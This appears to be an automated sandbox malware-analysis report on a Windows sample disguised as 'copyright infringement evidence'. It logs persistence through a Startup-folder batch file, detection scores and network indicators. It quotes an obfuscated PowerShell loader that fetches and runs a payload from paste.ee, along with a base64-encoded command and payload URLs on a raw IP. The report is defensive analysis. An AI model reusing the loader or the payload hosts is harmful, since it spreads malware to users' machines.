[Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgB

            Data Obfuscation

            barindex
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe, ProcessId: 6572, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txtVirustotal: Detection: 10%Perma Link
            Source: https://raw.githubusercontent.coVirustotal: Detection: 6%Perma Link
            Source: copyright_infringement_evidence_1.exeVirustotal: Detection: 15%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.0% probability
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A178F110 BCryptGenRandom,SystemFunction036,BCryptGenRandom,SystemFunction036,0_2_00007FF7A178F110
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A1803050 DecryptMessage,0_2_00007FF7A1803050
            Source: copyright_infringement_evidence_1.exeStatic PE information: certificate valid
            Source: copyright_infringement_evidence_1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb{ source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb A source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ib.pdb%~ source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n.pdb source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: btem.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bpdbtem.pdbn source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb2[0 source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb-d source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb}i source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: re.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: copyright_infringement_evidence_1.pdb source: copyright_infringement_evidence_1.exe, copyright_infringement_evidence_1.exe, 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000000.2054790226.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp
            Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Are source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ystem.Core.pdb/ source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2522177063.000001EF69D90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Target.pdbm source: powershell.exe, 00000023.00000002.2530199536.0000020828219000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: *e.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ion.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: re.pdbZJK source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 6?ystem.Core.pdb=K source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbLZ source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.96.3 443
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: Joe Sandbox ViewIP Address: 23.47.168.24 23.47.168.24
            Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.214.220.82/data/2p_bee.js
            Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.214.220.82/data/2p_bee.jsT
            Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.214.220.82/data/2x_bee.js
            Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.214.220.82/data/Benefits.pdf
            Source: copyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.214.220.82/data/Benefits.pdfy
            Source: powershell.exe, 00000023.00000002.2491780755.000002081FE6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2491780755.000002081FD28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/
            Source: wscript.exe, 0000000A.00000003.2751835714.000002459172B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756878169.0000024591734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2752132639.000002459172E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754105505.0000024591732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753930221.000002459172F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/0
            Source: wscript.exe, 0000002C.00000002.3473543541.000001A7C67E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/0Hqn
            Source: wscript.exe, 0000000A.00000003.2751835714.000002459172B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2759005910.00000245935F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753930221.000002459172C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753152909.00000245919C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756734173.000002459172C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2752530561.00000245938C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2758612409.00000245919CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2758847618.00000245935C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3473103355.0000025469B55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3473731925.000002546B766000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3475106348.000002546BA30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3473543541.000001A7C67C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2830702699.000001A7C6801000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2830853242.000001A7C6806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3472903249.000001A7C4C95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/0Hqnx
            Source: wscript.exe, 0000002C.00000002.3475617575.000001A7C6A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/0Hqnx2
            Source: wscript.exe, 00000008.00000003.2755090080.000001C4CE1B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757118395.000001C4CE1B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2752222728.000001C4CE1B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751783245.000001C4CE1A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/6
            Source: wscript.exe, 00000008.00000003.2754225942.000001C4D0006000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2759045448.000001C4CE4EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2754808331.000001C4D0007000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2753774026.000001C4CE4E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/6fcuV
            Source: wscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2755090080.000001C4CE1A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751783245.000001C4CE1A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/6fcuVl6r.dll
            Source: wscript.exe, 00000008.00000003.2751035108.000001C4D0290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/6fcuVn
            Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000023.00000002.2350744372.0000020811384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF5330C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
            Source: powershell.exe, 0000001D.00000002.2295368563.00000174D4B9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD2D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AAC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA5180F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.000002080FCB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB32723000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390C018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DBB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
            Source: powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.pki/
            Source: powershell.exe, 0000001D.00000002.2295368563.00000174D4BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
            Source: powershell.exe, 0000001D.00000002.2295368563.00000174D4B71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2295368563.00000174D4B63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2295109994.000001FBCD331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2569063235.000001BA5AACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA5180F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2571339903.000001AA517EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2350744372.000002080FCB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF51C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB32739000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2398514056.000002DB3274D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390BF5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2490781684.000002390BF6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.3150551059.000001ECD64AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2542796485.000002103DBB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: copyright_infringement_evidence_1.exe, copyright_infringement_evidence_1.exe, 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000000.2054790226.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: wscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000023.00000002.2350744372.00000208108E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2351652248.000001EF528A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 0000001F.00000002.2686280354.000001BA72CA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
            Source: powershell.exe, 00000023.00000002.2491780755.000002081FE6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2491780755.000002081FD28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wscript.exe, 0000002C.00000002.3471646885.000001A7C499D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C499D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee//a
            Source: wscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/1
            Source: wscript.exe, 0000000A.00000003.2747396981.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754284402.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2751344007.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750323628.0000024591770000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2757372602.0000024591770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/9
            Source: wscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/Ne
